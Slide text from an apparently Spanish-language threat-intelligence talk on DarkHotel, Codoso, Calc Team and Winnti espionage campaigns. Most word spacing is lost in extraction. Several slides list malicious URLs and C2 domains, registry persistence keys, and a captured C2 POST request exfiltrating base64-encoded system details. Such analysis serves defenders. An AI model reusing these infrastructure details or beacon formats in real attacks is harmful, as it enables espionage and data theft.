  • 21. Dark Hotel Team – Campanha #1 ▪ xsrmsd.exeencuentratodoslos.doc, .pdf, .xls, .txty creaunarchivocomprimidoconpassword 12345qwert!! ▪ Llave:HKEY_LOCAL_MACHINESOFTWAREMicrosoftActiveSetupInstalled Components{50036903-7717-484a-9345-7AE5FF85DCE9}StubPath Valor:%WINDIR%system32csntzjy.exe %APPDATA%MicrosoftWindowsExplorercsntzjy.exe
  • 22. Dark Hotel Team – Campanha #2 ▪ DarkHotelcomprometiolaseguridaddehotelesdelujoy mantuvoaccesoparaserusadocuandoseanecesario. ▪ Losobjetivossonusualmentealtosejecutivosdedistintas industriasconinteresesenlaregionasiatica. ▪ Alconectarsealareddelhotel,elobjetivorecibeun mensajedeactualizaciondeGoogle Toolbar,Adobe FlashoWindows Messenger. ▪ Kaspersky
  • 23. Codoso Team ▪ ActivodesdeAbril2011;tienevinculosconChina. ▪ Conduceintrusionesderedcomosoporteparaunesfuerzo decolecciondeinteligenciaglobal ▪ Verticalesafectadasincluyen ▪ Energia ▪ Finanzas ▪ Defenss ▪ Gobierno ▪ DisidentesPoliticos
  • 24. Codoso Team - TTPs ▪ SpearPhishingemails ▪ Waterholing ▪ Hanutilizadovulnerabidades0day ▪ Troyanohechoamedida:Mad Hatter/Codoso ▪ Utilizancorreosseñueloscontemasrelacioadosa problemasconChina,eventosmundialesypolitica internacional.
  • 25. Codoso Team – Campanha 1 ▪ Ennoviembredel2014,Codosoinfectolaconocidaweb forbes.com einyectouniframemalicioso: http://74.207.254.87/83a08vkzvt/8hthrx.swf ▪ Elobjectivo:explotar2vulnerabilidades0dayenFlash Player(CVE-2014-9163)eInternetExplorer9+ (CVE-2015-0071) ▪ SiesXPsoloseutilizaCVE-2014-9163,perosies Vista+exploitatambienIEparabypasseasASLR
  • 26. Codoso Team – Campanha 1 ▪ Checks
  • 27. Codoso Team – Campanha 1 ▪ ElexploitdescargaunaDLL(wuservice.dll)ylacarga en memoria. ▪ EstaDLLenumeraelequipoejecutandocomandosde reconocimiento:systeminfo, ipconfig, tasklist. ▪ EnvialainformacionrecaudadaenelVIEWSTATEbase 64 ▪ UnasegundaDLLcifradaconXOR(0x67)esdescargadae inyectadaenmemoria.
  • 28. Calc Team ▪ Activodesdeel2009,grupodeespionajeconnexosa China. ▪ HistoricamentesusobjetivoshansidoTaiwanyUSAconel finderecolectarinteligencia. ▪ Tecnicapreferida:Correoselectronicos+ingenieriasocial utilizandosiempretemasdegeopolitica. ▪ Explotovulnerabilidadesyaparchadas ▪ Utiliza3“familias”demalware
  • 29. Calc Team – Campanha 1 ▪ Spearphishing,“G20 Briefing Paper.zip” que contiene2binariosmaliciosos(.exe) ▪ G20DiscussionPaper.exe ▪ GPFIWorkPlan2013.exe ▪ LosbinariosescribenyabrenunarchivoPDFlegitimocon elvisorpordefecto. ▪ Secopiaa%TEMP%, ycreaunallavederegistropara serejecutadocuandoelequipoinicia (KeyLoggery dropper) ▪ Alcopiarse,seejecutaconelparametro“again”ycontacta astatus.acmetoy.com
  • 30. Calc Team – Campanha 1
  • 31. Calc Team – Campanha 1
  • 32. Calc Team – Campanha 2 ▪ Noviembre2015,APEC ▪ BriefingPaperonthePresident'sScheduleduringtheAPEC LeadersMeeting.zip ▪ Hojadecalculo(.xls)conunmacroobfuscadoembebido. ▪ Escribe ▪ %TEMP%AELMEntertainmentbudgetandAttendanceallowance.xls ▪ %TEMP%1C234643A8A8.tmp–Scriptdelimpieza ▪ %TEMP%1C224643A8B8.js –MalwareenJS ▪ HKCUSoftwareMicrosoftWindowsCurrentVersionRun network
  • 33. Calc Team – Campanha 2
  • 34. Calc Team – Campanha 2
  • 35. Calc Team – Campanha 2
  • 36. Calc Team – Campanha 2 ▪ POST/common.phpHTTP/1.1 Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1; Trident/5.0) Referer:https://www.google.com Content-Length:248 Accept:*/* Host:presentation.twilightXXXXXX.com Connection:Keep-Alive action=aaa&data=NzQzMDFjYzNjOWVmOTBiNDIzZDdiNDI 0ZDI2NDNiMGZ8MTcyLjE2LjI1NS4yfFdJTFNPTk5FTEx ZfFdJTFNPTk5FTExZXEFkbWluaXN0cmF0b3IoYWRta W5pc3RyYXRvcil8TWljcm9zb2Z0IFdpbmRvd3MgWF AgUHJvZmVzc2lvbmFsfDE3Mi4xNi4yNTUuMTo4ODg 4fGpzbmVbMS40XSxpbXB0LHByfA%3D%3D
  • 37. Winnti Team ▪ Identificadoen2009 ▪ Susataqueshansidoenfocadosalaindustriadejuegos primariamentepararobarcertificadosdigitalesque permitansoportenactividadesdecyberespionajeaotros objetivos. ▪ Nexosconotrosgruposdeespionajeconloscuales compartecertificadosdigitales
  • 43. Conclusiones ▪ AdvancedPersistentThreat? ▪ ElCyberEsiponajecontinuaraimplementandocuanta tecnicapuedasiempreycuandoseaefectiva ▪ Gruposdeespionajeorientalesutilizanlainformacion recaudaparafortacelersuindustriainernamientrasque occidentetieneotrosfines. ▪ Sudamerica?Peru?